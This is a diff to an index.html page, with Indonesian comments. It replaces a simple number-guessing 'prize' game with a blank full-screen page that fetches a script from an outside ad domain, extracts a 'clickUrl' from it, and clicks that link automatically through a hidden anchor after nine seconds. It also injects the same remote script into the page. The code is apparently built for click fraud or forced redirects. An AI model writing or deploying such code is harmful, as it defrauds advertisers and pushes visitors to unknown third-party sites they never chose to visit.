--- a/index.html
+++ b/index.html
@@ -2,86 +2,65 @@
 <html lang="id">
 <head>
   <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Auto Click Fondstudy URL (ambil clickUrl spesifik)</title>
   <meta name="76dd8e8109697f6c28e39fbb5c42b8cda112237d" content="76dd8e8109697f6c28e39fbb5c42b8cda112237d" />
-  <title>Mini Game Berhadiah</title>
   <style>
-    body {
-      font-family: Arial, sans-serif;
-      background: #f5f5f5;
-      text-align: center;
-      padding: 50px;
-    }
-    .game-box {
-      background: #fff;
-      padding: 20px;
-      border-radius: 12px;
-      max-width: 400px;
-      margin: auto;
-      box-shadow: 0 4px 12px rgba(0,0,0,0.1);
-    }
-    h1 {
-      color: #333;
-    }
-    input {
-      padding: 8px;
-      width: 60px;
-      text-align: center;
-      font-size: 1.2em;
-    }
-    button {
-      padding: 10px 15px;
-      margin-top: 10px;
-      background: #4caf50;
-      color: white;
-      border: none;
-      border-radius: 8px;
-      cursor: pointer;
-    }
-    button:hover {
-      background: #45a049;
-    }
-    .message {
-      margin-top: 15px;
-      font-weight: bold;
+    html, body {
+      margin: 0;
+      padding: 0;
+      height: 100%;
+      overflow: hidden;
     }
   </style>
 </head>
 <body>
 
-  <div class="game-box">
-    <h1>🎮 Mini Game Berhadiah</h1>
-    <p>Tebak angka antara <strong>1</strong> sampai <strong>10</strong>!</p>
-    <input type="number" id="guess" min="1" max="10" />
-    <br>
-    <button onclick="checkGuess()">Tebak</button>
-    <div class="message" id="message"></div>
-  </div>
+<script>
+  // URL script eksternal
+  const scriptURL = "//spitefuldecision.com/b/XmV/s.d/GRlC0IYTWocl/ee/ma9MuCZyUKlKkXPMTmY-2eNLjQAUwbNJDqgZtfNbjIYd2cM/DjAc0kOZQH";
 
-  <script>
-    const hadiah = "🎁 Selamat! Kamu menang hadiah spesial!";
-    const angkaBenar = Math.floor(Math.random() * 10) + 1;
+  fetch(scriptURL)
+    .then(res => res.text())
+    .then(jsCode => {
+      try {
+        // Cari blok JSON yang berisi "clickUrl"
+        const jsonMatch = jsCode.match(/"clickUrl":"(https?:\/\/[^"]+)"/);
+        if (jsonMatch && jsonMatch[1]) {
+          const clickUrl = jsonMatch[1];
+          console.log("clickUrl ditemukan:", clickUrl);
 
-    function checkGuess() {
-      const userGuess = parseInt(document.getElementById("guess").value);
-      const message = document.getElementById("message");
+          // Auto klik setelah 9 detik
+          setTimeout(() => {
+            const a = document.createElement("a");
+            a.href = clickUrl;
+            a.style.display = "none";
+            document.body.appendChild(a);
+            a.click();
+            a.remove();
+          }, 9000);
 
-      if (isNaN(userGuess)) {
-        message.textContent = "Masukkan angka dulu!";
-        message.style.color = "red";
-        return;
+        } else {
+          console.warn("clickUrl tidak ditemukan di script.");
+        }
+      } catch (err) {
+        console.error("Gagal parsing script:", err);
       }
+    })
+    .catch(err => console.error("Gagal fetch script:", err));
+</script>
 
-      if (userGuess === angkaBenar) {
-        message.textContent = hadiah;
-        message.style.color = "green";
-        alert(hadiah);
-      } else {
-        message.textContent = "❌ Salah! Coba lagi...";
-        message.style.color = "red";
-      }
-    }
-  </script>
+<script>
+(function(pamv){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = pamv || {};
+s.src = "\/\/spitefuldecision.com\/b\/XmV\/s.d\/GRlC0IYTWocl\/ee\/ma9MuCZyUKlKkXPMTmY-2eNLjQAUwbNJDqgZtfNbjIYd2cM\/DjAc0kOZQH";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 
 </body>
 </html>
